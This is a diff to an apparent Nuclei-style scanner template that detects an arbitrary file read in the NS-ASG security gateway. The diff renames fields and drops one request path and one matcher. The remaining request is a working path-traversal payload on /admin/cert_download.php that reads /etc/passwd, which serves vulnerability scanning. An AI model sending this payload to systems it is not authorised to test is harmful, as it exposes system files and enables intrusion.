--- a/vulnerabilities/other/ns-asg-file-read.yaml
+++ b/vulnerabilities/other/ns-asg-file-read.yaml
@@ -1,16 +1,14 @@
-id: ns-asg-file-read
+id: nsasg-arbitrary-file-read
 
 info:
-  name: NS ASG File Read
+  name: NS ASG Arbitrary File Read
   author: pikpikcu
   severity: high
-  reference: http://wiki.xypbk.com/Web%E5%AE%89%E5%85%A8/%E7%BD%91%E5%BA%B7%20NS-ASG%E5%AE%89%E5%85%A8%E7%BD%91%E5%85%B3/%E7%BD%91%E5%BA%B7%20NS-ASG%E5%AE%89%E5%85%A8%E7%BD%91%E5%85%B3%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
-  tags: ns-asg,lfi
+  tags: nsasg,lfi
 
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/admin/cert_download.php?file=pqpqpqpq.txt&certfile=cert_download.php"
       - "{{BaseURL}}/admin/cert_download.php?file=pqpqpqpq.txt&certfile=../../../../../../../../etc/passwd"
 
     matchers-condition: and
@@ -19,7 +17,6 @@ requests:
       - type: regex
         regex:
           - "root:[x*]:0:0"
-          - "$certfile"
 
       - type: status
         status:
